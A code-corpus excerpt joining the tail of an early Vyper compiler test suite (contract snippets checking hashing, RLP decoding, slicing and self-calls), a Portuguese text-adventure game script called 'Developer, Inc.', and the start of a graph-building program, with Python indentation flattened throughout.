"""
c = get_contract(string_literal_code)
assert c.foo() == b"horse"
assert c.bar() == b"badminton"
assert c.baz() == b"012345678901234567890123456789012"
assert c.baz2() == b"0123456789012345678901234567890112"
assert c.baz3() == b"01234567890123456789012345678901"
assert c.baz4() == b"0123456789" * 10
print("Passed string literal test")
def test_kode():
for i in range(95, 96, 97):
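# note: range(95, 96, 97) yields only 95, so this fuzz loop runs for a single string length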
kode = """
moo: bytes <= 100
def foo(s: num, L: num) -> bytes <= 100:
x = 27
r = slice("%s", start=s, len=L)
y = 37
if x * y == 999:
return r
def bar(s: num, L: num) -> bytes <= 100:
self.moo = "%s"
x = 27
r = slice(self.moo, start=s, len=L)
y = 37
if x * y == 999:
return r
def baz(s: num, L: num) -> bytes <= 100:
x = 27
self.moo = slice("%s", start=s, len=L)
y = 37
if x * y == 999:
return self.moo
""" % (("c" * i), ("c" * i), ("c" * i))
c = get_contract(kode)
for e in range(63, 64, 65):
for _s in range(31, 32, 33):
o1 = c.foo(_s, e - _s)
o2 = c.bar(_s, e - _s)
o3 = c.baz(_s, e - _s)
assert o1 == o2 == o3 == b"c" * (e - _s), (i, _s, e - _s, o1, o2, o3)
print("Passed string literal splicing fuzz-test")
def test_hash_code():
hash_code = """
def foo(inp: bytes <= 100) -> bytes32:
return sha3(inp)
def bar() -> bytes32:
return sha3("inp")
"""
c = get_contract(hash_code)
for inp in (b"", b"cow", b"s" * 31, b"\xff" * 32, b"\n" * 33, b"g" * 64, b"h" * 65):
assert c.foo(inp) == u.sha3(inp)
assert c.bar() == u.sha3("inp")
def test_hash_code2():
hash_code2 = """
def foo(inp: bytes <= 100) -> bool:
return sha3(inp) == sha3("badminton")
"""
c = get_contract(hash_code2)
assert c.foo(b"badminto") is False
assert c.foo(b"badminton") is True
def test_hash_code3():
hash_code3 = """
test: bytes <= 100
def set_test(inp: bytes <= 100):
self.test = inp
def tryy(inp: bytes <= 100) -> bool:
return sha3(inp) == sha3(self.test)
def trymem(inp: bytes <= 100) -> bool:
x = self.test
return sha3(inp) == sha3(x)
def try32(inp: bytes32) -> bool:
return sha3(inp) == sha3(self.test)
"""
c = get_contract(hash_code3)
c.set_test(b"")
assert c.tryy(b"") is True
assert c.trymem(b"") is True
assert c.tryy(b"cow") is False
c.set_test(b"cow")
assert c.tryy(b"") is False
assert c.tryy(b"cow") is True
c.set_test(b"\x35" * 32)
assert c.tryy(b"\x35" * 32) is True
assert c.trymem(b"\x35" * 32) is True
assert c.try32(b"\x35" * 32) is True
assert c.tryy(b"\x35" * 33) is False
c.set_test(b"\x35" * 33)
assert c.tryy(b"\x35" * 32) is False
assert c.trymem(b"\x35" * 32) is False
assert c.try32(b"\x35" * 32) is False
assert c.tryy(b"\x35" * 33) is True
print("Passed SHA3 hash test")
def test_method_id_test():
method_id_test = """
def double(x: num) -> num:
return x * 2
def returnten() -> num:
ans = raw_call(self, concat(method_id("double(int128)"), as_bytes32(5)), gas=50000, outsize=32)
return as_num128(extract32(ans, 0))
"""
c = get_contract(method_id_test)
assert c.returnten() == 10
print("Passed method ID test")
def test_ecrecover_test():
ecrecover_test = """
def test_ecrecover(h: bytes32, v:num256, r:num256, s:num256) -> address:
return ecrecover(h, v, r, s)
def test_ecrecover2() -> address:
return ecrecover(0x3535353535353535353535353535353535353535353535353535353535353535,
as_num256(28),
as_num256(63198938615202175987747926399054383453528475999185923188997970550032613358815),
as_num256(6577251522710269046055727877571505144084475024240851440410274049870970796685))
"""
c = get_contract(ecrecover_test)
h = b'\x35' * 32
k = b'\x46' * 32
v, r, S = u.ecsign(h, k)
assert c.test_ecrecover(h, v, r, S) == '0x' + u.encode_hex(u.privtoaddr(k))
assert c.test_ecrecover2() == '0x' + u.encode_hex(u.privtoaddr(k))
print("Passed ecrecover test")
def test_extract32_code():
extract32_code = """
y: bytes <= 100
def extrakt32(inp: bytes <= 100, index: num) -> bytes32:
return extract32(inp, index)
def extrakt32_mem(inp: bytes <= 100, index: num) -> bytes32:
x = inp
return extract32(x, index)
def extrakt32_storage(index: num, inp: bytes <= 100) -> bytes32:
self.y = inp
return extract32(self.y, index)
"""
c = get_contract_with_gas_estimation(extract32_code)
test_cases = (
(b"c" * 31, 0),
(b"c" * 32, 0),
(b"c" * 32, -1),
(b"c" * 33, 0),
(b"c" * 33, 1),
(b"c" * 33, 2),
(b"cow" * 30, 0),
(b"cow" * 30, 1),
(b"cow" * 30, 31),
(b"cow" * 30, 32),
(b"cow" * 30, 33),
(b"cow" * 30, 34),
(b"cow" * 30, 58),
(b"cow" * 30, 59),
)
for S, i in test_cases:
expected_result = S[i: i + 32] if 0 <= i <= len(S) - 32 else None
if expected_result is None:
try:
o = c.extrakt32(S, i)
success = True
except:
success = False
assert not success
else:
assert c.extrakt32(S, i) == expected_result
assert c.extrakt32_mem(S, i) == expected_result
assert c.extrakt32_storage(i, S) == expected_result
print("Passed bytes32 extraction test")
def test_test_concat_bytes32():
test_concat_bytes32 = """
def sandwich(inp: bytes <= 100, inp2: bytes32) -> bytes <= 164:
return concat(inp2, inp, inp2)
def fivetimes(inp: bytes32) -> bytes <= 160:
return concat(inp, inp, inp, inp, inp)
"""
c = get_contract(test_concat_bytes32)
assert c.sandwich(b"cow", b"\x35" * 32) == b"\x35" * 32 + b"cow" + b"\x35" * 32, c.sandwich(b"cow", b"\x35" * 32)
assert c.sandwich(b"", b"\x46" * 32) == b"\x46" * 64
assert c.sandwich(b"\x57" * 95, b"\x57" * 32) == b"\x57" * 159
assert c.sandwich(b"\x57" * 96, b"\x57" * 32) == b"\x57" * 160
assert c.sandwich(b"\x57" * 97, b"\x57" * 32) == b"\x57" * 161
assert c.fivetimes(b"mongoose" * 4) == b"mongoose" * 20
print("Passed concat bytes32 test")
def test_test_wei():
test_wei = """
def return_2_finney() -> wei_value:
return as_wei_value(2, finney)
def return_3_finney() -> wei_value:
return as_wei_value(2 + 1, finney)
def return_2p5_ether() -> wei_value:
return as_wei_value(2.5, ether)
def return_3p5_ether() -> wei_value:
return as_wei_value(2.5 + 1, ether)
def return_2pow64_wei() -> wei_value:
return as_wei_value(18446744.073709551616, szabo)
"""
c = get_contract_with_gas_estimation(test_wei)
assert c.return_2_finney() == 2 * 10**15
assert c.return_3_finney() == 3 * 10**15, c.return_3_finney()
assert c.return_2p5_ether() == 2.5 * 10**18
assert c.return_3p5_ether() == 3.5 * 10**18
assert c.return_2pow64_wei() == 2**64
print("Passed wei value literals test")
def test_caller_code():
caller_code = """
def foo() -> bytes <= 7:
return raw_call(0x0000000000000000000000000000000000000004, "moose", gas=50000, outsize=5)
def bar() -> bytes <= 7:
return raw_call(0x0000000000000000000000000000000000000004, "moose", gas=50000, outsize=3)
def baz() -> bytes <= 7:
return raw_call(0x0000000000000000000000000000000000000004, "moose", gas=50000, outsize=7)
"""
c = get_contract(caller_code)
assert c.foo() == b"moose"
assert c.bar() == b"moo"
assert c.baz() == b"moose\x00\x00"
print('Passed raw call test')
def test_extract32_code():
extract32_code = """
def foo(inp: bytes <= 32) -> num:
return extract32(inp, 0, type=num128)
def bar(inp: bytes <= 32) -> num256:
return extract32(inp, 0, type=num256)
def baz(inp: bytes <= 32) -> bytes32:
return extract32(inp, 0, type=bytes32)
def fop(inp: bytes <= 32) -> bytes32:
return extract32(inp, 0)
def foq(inp: bytes <= 32) -> address:
return extract32(inp, 0, type=address)
"""
c = get_contract(extract32_code)
assert c.foo(b"\x00" * 30 + b"\x01\x01") == 257
assert c.bar(b"\x00" * 30 + b"\x01\x01") == 257
try:
c.foo(b"\x80" + b"\x00" * 30)
success = True
except:
success = False
assert not success
assert c.bar(b"\x80" + b"\x00" * 31) == 2**255
assert c.baz(b"crow" * 8) == b"crow" * 8
assert c.fop(b"crow" * 8) == b"crow" * 8
assert c.foq(b"\x00" * 12 + b"3" * 20) == "0x" + "3" * 40
try:
c.foq(b"crow" * 8)
success = True
except:
success = False
assert not success
print('Passed extract32 test')
def test_bytes_to_num_code():
bytes_to_num_code = """
def foo(x: bytes <= 32) -> num:
return bytes_to_num(x)
"""
c = get_contract(bytes_to_num_code)
assert c.foo(b"") == 0
try:
c.foo(b"\x00")
success = True
except:
success = False
assert not success
assert c.foo(b"\x01") == 1
try:
c.foo(b"\x00\x01")
success = True
except:
success = False
assert not success
assert c.foo(b"\x01\x00") == 256
assert c.foo(b"\x01\x00\x00\x00\x01") == 4294967297
assert c.foo(b"\xff" * 32) == -1
try:
c.foo(b"\x80" + b"\xff" * 31)
success = True
except:
success = False
try:
c.foo(b"\x01" * 33)
success = True
except:
success = False
print('Passed bytes_to_num tests')
def test_rlp_decoder_code():
import rlp
rlp_decoder_code = """
u: bytes <= 100
def foo() -> address:
x = RLPList('\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG', [address, bytes32])
return x[0]
def fop() -> bytes32:
x = RLPList('\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG', [address, bytes32])
return x[1]
def foq() -> bytes <= 100:
x = RLPList('\xc5\x83cow\x03', [bytes, num])
return x[0]
def fos() -> num:
x = RLPList('\xc5\x83cow\x03', [bytes, num])
return x[1]
def fot() -> num256:
x = RLPList('\xc5\x83cow\x03', [bytes, num256])
return x[1]
def qoo(inp: bytes <= 100) -> address:
x = RLPList(inp, [address, bytes32])
return x[0]
def qos(inp: bytes <= 100) -> num:
x = RLPList(inp, [num, num])
return x[0] + x[1]
def qot(inp: bytes <= 100):
x = RLPList(inp, [num, num])
def qov(inp: bytes <= 100):
x = RLPList(inp, [num256, num256])
def roo(inp: bytes <= 100) -> address:
self.u = inp
x = RLPList(self.u, [address, bytes32])
return x[0]
def too(inp: bytes <= 100) -> bool:
x = RLPList(inp, [bool])
return x[0]
def voo(inp: bytes <= 1024) -> num:
x = RLPList(inp, [num, num, bytes32, num, bytes32, bytes])
return x[1]
"""
c = get_contract(rlp_decoder_code)
assert c.foo() == '0x' + '35' * 20
assert c.fop() == b'G' * 32
assert c.foq() == b'cow'
assert c.fos() == 3
assert c.fot() == 3
assert c.qoo(b'\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG') == '0x' + '35' * 20
assert c.roo(b'\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG') == '0x' + '35' * 20
assert c.qos(rlp.encode([3, 30])) == 33
assert c.qos(rlp.encode([3, 2**100 - 5])) == 2**100 - 2
assert c.voo(rlp.encode([b'', b'\x01', b'\xbds\xc31\xf5=b\xa5\xcfy]\x0f\x05\x8f}\\\xf3\xe6\xea\x9d~\r\x96\xda\xdf:+\xdb4pm\xcc', b'', b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b:\xcd\x85\x9b\x84`FD\xf9\xa8'\x8ezR\xd5\xc9*\xf5W\x1f\x14\xc2\x0cd\xa0\x17\xd4Z\xde\x9d\xc2\x18_\x82B\xc2\xaa\x82\x19P\xdd\xa2\xd0\xe9(\xcaO\xe2\xb1\x13s\x05yS\xc3q\xdb\x1eB\xe2g\xaa'\xba"])) == 1
try:
c.qot(rlp.encode([7, 2**160]))
success = True
except:
success = False
assert not success
c.qov(rlp.encode([7, 2**160]))
try:
c.qov(rlp.encode([2**160]))
success = True
except:
success = False
assert not success
try:
c.qov(rlp.encode([b'\x03', b'\x00\x01']))
success = True
except:
success = False
assert not success
c.qov(rlp.encode([b'\x03', b'\x01']))
c.qov(rlp.encode([b'\x03', b'']))
try:
c.qov(rlp.encode([b'\x03', b'\x00']))
success = True
except:
success = False
assert not success
assert c.too(rlp.encode([b'\x01'])) is True
assert c.too(rlp.encode([b''])) is False
try:
c.too(rlp.encode([b'\x02']))
success = True
except:
success = False
assert not success
try:
c.too(rlp.encode([b'\x00']))
success = True
except:
success = False
assert not success
print('Passed RLP decoder tests')
def test_getter_code():
getter_code = """
x: public(wei_value)
y: public(num[5])
z: public(bytes <= 100)
w: public({
a: wei_value,
b: num[7],
c: bytes <= 100,
d: num[address],
e: num[3][3],
f: timestamp,
g: wei_value
}[num])
def __init__():
self.x = as_wei_value(7, wei)
self.y[1] = 9
self.z = "cow"
self.w[1].a = 11
self.w[1].b[2] = 13
self.w[1].c = "horse"
self.w[1].d[0x1234567890123456789012345678901234567890] = 15
self.w[2].e[1][2] = 17
self.w[3].f = 750
self.w[3].g = 751
"""
c = get_contract(getter_code)
assert c.get_x() == 7
assert c.get_y(1) == 9
assert c.get_z() == b"cow"
assert c.get_w__a(1) == 11
assert c.get_w__b(1, 2) == 13
assert c.get_w__c(1) == b"horse"
assert c.get_w__d(1, "0x1234567890123456789012345678901234567890") == 15
assert c.get_w__e(2, 1, 2) == 17
assert c.get_w__f(3) == 750
assert c.get_w__g(3) == 751
print('Passed getter tests')
def test_konkat_code():
konkat_code = """
ecks: bytes32
def foo(x: bytes32, y: bytes32) -> bytes <= 64:
selfecks = x
return concat(selfecks, y)
def goo(x: bytes32, y: bytes32) -> bytes <= 64:
self.ecks = x
return concat(self.ecks, y)
def hoo(x: bytes32, y: bytes32) -> bytes <= 64:
return concat(x, y)
"""
c = get_contract(konkat_code)
assert c.foo(b'\x35' * 32, b'\x00' * 32) == b'\x35' * 32 + b'\x00' * 32
assert c.goo(b'\x35' * 32, b'\x00' * 32) == b'\x35' * 32 + b'\x00' * 32
assert c.hoo(b'\x35' * 32, b'\x00' * 32) == b'\x35' * 32 + b'\x00' * 32
print('Passed second concat tests')
def test_conditional_return_code():
conditional_return_code = """
def foo(i: bool) -> num:
if i:
return 5
else:
assert 2
return 7
return 11
"""
c = get_contract_with_gas_estimation(conditional_return_code)
assert c.foo(True) == 5
assert c.foo(False) == 7
print('Passed conditional return tests')
def test_large_input_code():
large_input_code = """
def foo(x: num) -> num:
return 3
"""
c = get_contract_with_gas_estimation(large_input_code)
c.foo(1274124)
c.foo(2**120)
try:
c.foo(2**130)
success = True
except:
success = False
assert not success
def test_large_input_code_2():
large_input_code_2 = """
def __init__(x: num):
y = x
def foo() -> num:
return 5
"""
c = get_contract(large_input_code_2, args=[17], sender=t.k0, value=0)
try:
c = get_contract(large_input_code_2, args=[2**130], sender=t.k0, value=0)
success = True
except:
success = False
assert not success
print('Passed invalid input tests')
def test_loggy_code():
loggy_code = """
s: bytes <= 100
def foo():
raw_log([], "moo")
def goo():
raw_log([0x1234567812345678123456781234567812345678123456781234567812345678], "moo2")
def hoo():
self.s = "moo3"
raw_log([], self.s)
def ioo(inp: bytes <= 100):
raw_log([], inp)
"""
c = get_contract(loggy_code)
c.foo()
assert s.head_state.receipts[-1].logs[0].data == b'moo'
c.goo()
assert s.head_state.receipts[-1].logs[0].data == b'moo2'
assert s.head_state.receipts[-1].logs[0].topics == [0x1234567812345678123456781234567812345678123456781234567812345678]
c.hoo()
assert s.head_state.receipts[-1].logs[0].data == b'moo3'
c.ioo(b"moo4")
assert s.head_state.receipts[-1].logs[0].data == b'moo4'
print("Passed raw log tests")
def test_test_bitwise():
test_bitwise = """
def _bitwise_and(x: num256, y: num256) -> num256:
return bitwise_and(x, y)
def _bitwise_or(x: num256, y: num256) -> num256:
return bitwise_or(x, y)
def _bitwise_xor(x: num256, y: num256) -> num256:
return bitwise_xor(x, y)
def _bitwise_not(x: num256) -> num256:
return bitwise_not(x)
def _shift(x: num256, y: num) -> num256:
return shift(x, y)
"""
c = get_contract(test_bitwise)
x = 126416208461208640982146408124
y = 7128468721412412459
assert c._bitwise_and(x, y) == (x & y)
assert c._bitwise_or(x, y) == (x | y)
assert c._bitwise_xor(x, y) == (x ^ y)
assert c._bitwise_not(x) == 2**256 - 1 - x
assert c._shift(x, 3) == x * 8
assert c._shift(x, 255) == 0
assert c._shift(y, 255) == 2**255
assert c._shift(x, 256) == 0
assert c._shift(x, 0) == x
assert c._shift(x, -1) == x // 2
assert c._shift(x, -3) == x // 8
assert c._shift(x, -256) == 0
print("Passed bitwise operation tests")
def test_num256_code():
num256_code = """
def _num256_add(x: num256, y: num256) -> num256:
return num256_add(x, y)
def _num256_sub(x: num256, y: num256) -> num256:
return num256_sub(x, y)
def _num256_mul(x: num256, y: num256) -> num256:
return num256_mul(x, y)
def _num256_div(x: num256, y: num256) -> num256:
return num256_div(x, y)
def _num256_gt(x: num256, y: num256) -> bool:
return num256_gt(x, y)
def _num256_ge(x: num256, y: num256) -> bool:
return num256_ge(x, y)
def _num256_lt(x: num256, y: num256) -> bool:
return num256_lt(x, y)
def _num256_le(x: num256, y: num256) -> bool:
return num256_le(x, y)
"""
c = get_contract_with_gas_estimation(num256_code)
x = 126416208461208640982146408124
y = 7128468721412412459
assert c._num256_add(x, y) == x + y
assert c._num256_sub(x, y) == x - y
assert c._num256_sub(y, x) == 2**256 + y - x
assert c._num256_mul(x, y) == x * y
assert c._num256_mul(2**128, 2**128) == 0
assert c._num256_div(x, y) == x // y
assert c._num256_div(y, x) == 0
assert c._num256_gt(x, y) is True
assert c._num256_ge(x, y) is True
assert c._num256_le(x, y) is False
assert c._num256_lt(x, y) is False
assert c._num256_gt(x, x) is False
assert c._num256_ge(x, x) is True
assert c._num256_le(x, x) is True
assert c._num256_lt(x, x) is False
assert c._num256_lt(y, x) is True
print("Passed num256 operation tests")
def test_selfcall_code():
selfcall_code = """
def foo() -> num:
return 3
def bar() -> num:
return self.foo()
"""
c = get_contract(selfcall_code)
assert c.bar() == 3
print("Passed no-argument self-call test")
def test_selfcall_code_2():
selfcall_code_2 = """
def double(x: num) -> num:
return x * 2
def returnten() -> num:
return self.double(5)
def _hashy(x: bytes32) -> bytes32:
return sha3(x)
def return_hash_of_rzpadded_cow() -> bytes32:
return self._hashy(0x636f770000000000000000000000000000000000000000000000000000000000)
"""
c = get_contract(selfcall_code_2)
assert c.returnten() == 10
assert c.return_hash_of_rzpadded_cow() == u.sha3(b'cow' + b'\x00' * 29)
print("Passed single fixed-size argument self-call test")
def test_selfcall_code_3():
selfcall_code_3 = """
def _hashy2(x: bytes <= 100) -> bytes32:
return sha3(x)
def return_hash_of_cow_x_30() -> bytes32:
return self._hashy2("cowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcow")
def _len(x: bytes <= 100) -> num:
return len(x)
def returnten() -> num:
return self._len("badminton!")
"""
c = get_contract(selfcall_code_3)
assert c.return_hash_of_cow_x_30() == u.sha3(b'cow' * 30)
assert c.returnten() == 10
print("Passed single variable-size argument self-call test")
def test_selfcall_code_4():
selfcall_code_4 = """
def summy(x: num, y: num) -> num:
return x + y
def catty(x: bytes <= 5, y: bytes <= 5) -> bytes <= 10:
return concat(x, y)
def slicey1(x: bytes <= 10, y: num) -> bytes <= 10:
return slice(x, start=0, len=y)
def slicey2(y: num, x: bytes <= 10) -> bytes <= 10:
return slice(x, start=0, len=y)
def returnten() -> num:
return self.summy(3, 7)
def return_mongoose() -> bytes <= 10:
return self.catty("mon", "goose")
def return_goose() -> bytes <= 10:
return self.slicey1("goosedog", 5)
def return_goose2() -> bytes <= 10:
return self.slicey2(5, "goosedog")
"""
c = get_contract(selfcall_code_4)
assert c.returnten() == 10
assert c.return_mongoose() == b"mongoose"
assert c.return_goose() == b"goose"
assert c.return_goose2() == b"goose"
print("Passed multi-argument self-call test")
def test_selfcall_code_5():
selfcall_code_5 = """
counter: num
def increment():
self.counter += 1
def returnten() -> num:
for i in range(10):
self.increment()
return self.counter
"""
c = get_contract(selfcall_code_5)
assert c.returnten() == 10
print("Passed self-call statement test")
def test_selfcall_code_6():
selfcall_code_6 = """
excls: bytes <= 32
def set_excls(arg: bytes <= 32):
self.excls = arg
def underscore() -> bytes <= 1:
return "_"
def hardtest(x: bytes <= 100, y: num, z: num, a: bytes <= 100, b: num, c: num) -> bytes <= 201:
return concat(slice(x, start=y, len=z), self.underscore(), slice(a, start=b, len=c))
def return_mongoose_revolution_32_excls() -> bytes <= 201:
self.set_excls("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
return self.hardtest("megamongoose123", 4, 8, concat("russian revolution", self.excls), 8, 42)
"""
c = get_contract(selfcall_code_6)
assert c.return_mongoose_revolution_32_excls() == b"mongoose_revolution" + b"!" * 32
print("Passed composite self-call test")
def test_clamper_test_code():
clamper_test_code = """
def foo(s: bytes <= 3) -> bytes <= 3:
return s
"""
c = get_contract(clamper_test_code, value=1)
assert c.foo(b"ca") == b"ca"
assert c.foo(b"cat") == b"cat"
try:
c.foo(b"cate")
success = True
except t.TransactionFailed:
success = False
assert not success
print("Passed bytearray clamping test")
def test_multiple_levels():
inner_code = """
def returnten() -> num:
return 10
"""
c = get_contract(inner_code)
outer_code = """
def create_and_call_returnten(inp: address) -> num:
x = create_with_code_of(inp)
o = extract32(raw_call(x, "\xd0\x1f\xb1\xb8", outsize=32, gas=50000), 0, type=num128)
return o
def create_and_return_forwarder(inp: address) -> address:
return create_with_code_of(inp)
"""
c2 = get_contract(outer_code)
assert c2.create_and_call_returnten(c.address) == 10
expected_forwarder_code_mask = b'`.`\x0c`\x009`.`\x00\xf36`\x00`\x007a\x10\x00`\x006`\x00s\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Z\xf4\x15XWa\x10\x00`\x00\xf3'[12:]
c3 = c2.create_and_return_forwarder(c.address)
assert s.head_state.get_code(c3)[:15] == expected_forwarder_code_mask[:15]
assert s.head_state.get_code(c3)[35:] == expected_forwarder_code_mask[35:]
print('Passed forwarder test')
# TODO: This one is special
print('Gas consumed: %d' % (s.head_state.receipts[-1].gas_used - s.head_state.receipts[-2].gas_used - s.last_tx.intrinsic_gas_used))
def test_multiple_levels2():
inner_code = """
def returnten() -> num:
assert False
return 10
"""
c = get_contract_with_gas_estimation(inner_code)
outer_code = """
def create_and_call_returnten(inp: address) -> num:
x = create_with_code_of(inp)
o = extract32(raw_call(x, "\xd0\x1f\xb1\xb8", outsize=32, gas=50000), 0, type=num128)
return o
def create_and_return_forwarder(inp: address) -> address:
return create_with_code_of(inp)
"""
c2 = get_contract_with_gas_estimation(outer_code)
try:
c2.create_and_call_returnten(c.address)
success = True
except:
success = False
assert not success
print('Passed forwarder exception test')
def test_list_tester_code():
list_tester_code = """
z: num[3]
z2: num[2][2]
z3: num[2]
def foo(x: num[3]) -> num:
return x[0] + x[1] + x[2]
def goo(x: num[2][2]) -> num:
return x[0][0] + x[0][1] + x[1][0] * 10 + x[1][1] * 10
def hoo(x: num[3]) -> num:
y = x
return y[0] + x[1] + y[2]
def joo(x: num[2][2]) -> num:
y = x
y2 = x[1]
return y[0][0] + y[0][1] + y2[0] * 10 + y2[1] * 10
def koo(x: num[3]) -> num:
self.z = x
return self.z[0] + x[1] + self.z[2]
def loo(x: num[2][2]) -> num:
self.z2 = x
self.z3 = x[1]
return self.z2[0][0] + self.z2[0][1] + self.z3[0] * 10 + self.z3[1] * 10
"""
c = get_contract(list_tester_code)
assert c.foo([3,4,5]) == 12
assert c.goo([[1,2],[3,4]]) == 73
assert c.hoo([3,4,5]) == 12
assert c.joo([[1,2],[3,4]]) == 73
assert c.koo([3,4,5]) == 12
assert c.loo([[1,2],[3,4]]) == 73
print("Passed list tests")
def test_list_output_tester_code():
list_output_tester_code = """
z: num[2]
def foo() -> num[2]:
return [3, 5]
def goo() -> num[2]:
x = [3, 5]
return x
def hoo() -> num[2]:
self.z = [3, 5]
return self.z
def joo() -> num[2]:
self.z = [3, 5]
x = self.z
return x
def koo() -> num[2][2]:
return [[1,2],[3,4]]
def loo() -> num[2][2]:
x = [[1,2],[3,4]]
return x
def moo() -> num[2][2]:
x = [1,2]
return [x,[3,4]]
def noo(inp: num[2]) -> num[2]:
return inp
def poo(inp: num[2][2]) -> num[2][2]:
return inp
def qoo(inp: num[2]) -> num[2][2]:
return [inp,[3,4]]
def roo(inp: num[2]) -> decimal[2][2]:
return [inp,[3,4]]
"""
c = get_contract(list_output_tester_code)
assert c.foo() == [3,5]
assert c.goo() == [3,5]
assert c.hoo() == [3,5]
assert c.joo() == [3,5]
assert c.koo() == [[1,2],[3,4]]
assert c.loo() == [[1,2],[3,4]]
assert c.moo() == [[1,2],[3,4]]
assert c.noo([3,5]) == [3,5]
assert c.poo([[1,2],[3,4]]) == [[1,2],[3,4]]
assert c.qoo([1,2]) == [[1,2],[3,4]]
assert c.roo([1,2]) == [[1.0,2.0],[3.0,4.0]]
print("Passed list output tests")
def test_internal_test():
internal_test = """
@internal
def a() -> num:
return 5
def returnten() -> num:
return self.a() * 2
"""
c = get_contract(internal_test)
assert c.returnten() == 10
print("Passed internal function test")
def test_minmax():
minmax_test = """
def foo() -> decimal:
return min(3, 5) + max(10, 20) + min(200.1, 400) + max(3000, 8000.02) + min(50000.003, 70000.004)
def goo() -> num256:
return num256_add(min(as_num256(3), as_num256(5)), max(as_num256(40), as_num256(80)))
"""
c = get_contract(minmax_test)
assert c.foo() == 58223.123
assert c.goo() == 83
print("Passed min/max test")
``` |
{
"source": "01ch01/developer-inc",
"score": 4
} |
#### File: 01ch01/developer-inc/main.py
```python
from os import name, system
from variables import *
# define global variables
inventory = {
"health": 10,
"money": 10,
"social": 10,
"fame": 10,
}
scenarios = [
scenario01,
scenario02,
scenario03,
scenario04,
scenario05,
scenario06,
scenario07,
scenario08,
]
def clear_console(): system('cls' if name == 'nt' else 'clear')
def choose():
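# keep prompting until the player types exactly "true" or "false"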
decision = 'null'
while(decision != 'false' and decision != 'true'):
decision = input('\n\tVocê aceita (true) ou recusa (false)? ')
decision = decision.lower().strip()
if decision == 'true':
return True
elif decision == 'false':
return False
else:
print('\n\t⚠️ Por favor, digite apenas "true" ou "false" ⚠️\n')
def showMenu():
print("""\n
*********************
** DEVELOPER, INC. **
*********************
---------------------
| 0 - Iniciar jogo |
| 1 - Créditos |
| 2 - Sair |
---------------------
\n""")
def is_player_alive(inventory):
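# the player loses as soon as any stat drops to zero or below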
flag = True
for item_value in inventory.values():
if item_value <= 0:
flag = False
return flag
def show_inventory():
global inventory
print(f"""\n
STATUS ATUAL:
Saúde: {inventory['health']}
Dinheiro: {inventory['money']}
Vida social: {inventory['social']}
Fama: {inventory['fame']}
""")
def start_game():
global scenarios
global inventory
reset_inventory(inventory)
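# each scenario nudges health, money, social and fame up or down depending on the true/false answer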
for scenario in scenarios:
if is_player_alive(inventory) == False:
game_over()
break
print(scenario)
boolean_answer = choose()
if scenario == scenario01:
if boolean_answer:
inventory['health'] -= 2
inventory['money'] += 2
inventory['social'] -= 3
inventory['fame'] += 1
else:
inventory['health'] += 1
inventory['money'] -= 4
inventory['social'] += 1
inventory['fame'] -= 1
clear_console()
show_inventory()
elif scenario == scenario02:
if boolean_answer:
inventory['health'] += 2
inventory['money'] -= 4
inventory['social'] -= 0
inventory['fame'] += 2
else:
inventory['health'] -= 2
inventory['money'] += 4
inventory['social'] += 0
inventory['fame'] -= 2
clear_console()
show_inventory()
elif scenario == scenario03:
if boolean_answer:
inventory['health'] += 1
inventory['money'] -= 5
inventory['social'] += 2
inventory['fame'] += 2
else:
inventory['health'] -= 3
inventory['money'] += 4
inventory['social'] -= 4
inventory['fame'] -= 3
clear_console()
show_inventory()
elif scenario == scenario04:
if boolean_answer:
inventory['health'] -= 9
inventory['money'] -= 6
inventory['social'] += 8
inventory['fame'] += 5
else:
inventory['health'] += 4
inventory['money'] += 8
inventory['social'] -= 4
inventory['fame'] -= 3
clear_console()
show_inventory()
elif scenario == scenario05:
if boolean_answer:
inventory['health'] += 9
inventory['money'] -= 8
inventory['social'] -= 0
inventory['fame'] += 0
else:
inventory['health'] -= 9
inventory['money'] += 8
inventory['social'] += 0
inventory['fame'] -= 0
clear_console()
show_inventory()
elif scenario == scenario06:
if boolean_answer:
inventory['health'] += 5
inventory['money'] += 2
inventory['social'] += 8
inventory['fame'] -= 8
else:
inventory['health'] -= 3
inventory['money'] -= 2
inventory['social'] -= 4
inventory['fame'] += 3
clear_console()
show_inventory()
elif scenario == scenario07:
if boolean_answer:
inventory['health'] -= 10
inventory['money'] += 8
inventory['social'] -= 11
inventory['fame'] += 10
else:
inventory['health'] += 5
inventory['money'] -= 7
inventory['social'] += 2
inventory['fame'] -= 5
clear_console()
show_inventory()
elif scenario == scenario08:
if boolean_answer:
inventory['health'] -= 2
inventory['money'] -= 10
inventory['social'] -= 3
inventory['fame'] += 5
else:
inventory['health'] += 1
inventory['money'] += 4
inventory['social'] += 1
inventory['fame'] -= 8
clear_console()
show_inventory()
# clear_console()
pass
clear_console()
end_game()
def reset_inventory(inventory):
# iterate over the keys so the assignments actually reset the stored values
for item in inventory:
inventory[item] = 10
def main():
while True:
showMenu()
menu_option = input("\n\tEscolha uma opção: ")
if menu_option == '0':
clear_console()
presentation()
clear_console()
start_game()
elif menu_option == '1':
clear_console()
show_credits()
elif menu_option == '2':
clear_console()
bye()
break
else:
print('\n\tFavor inserir uma opção válida!\n')
if __name__ == "__main__":
main()
``` |
{
"source": "01ch01/implementacao-grafos",
"score": 4
} |
#### File: 01ch01/implementacao-grafos/main_functions.py
```python
import os
def clear_console(): os.system('cls' if os.name == 'nt' else 'clear')
def create_graph():
graph = {}
qtd_vertices = int(input("Insira o número de vértices: "))
for i in range(qtd_vertices):
graph[i+1] = []
while True:
clear_console()
print('\n*** Digite "-1" para terminar a criação do grafo ***\n')
v1 = int(input('Insira um vértice: '))
if(v1 == -1):
break
v2 = int(input('Insira o vértice que se conecta: '))
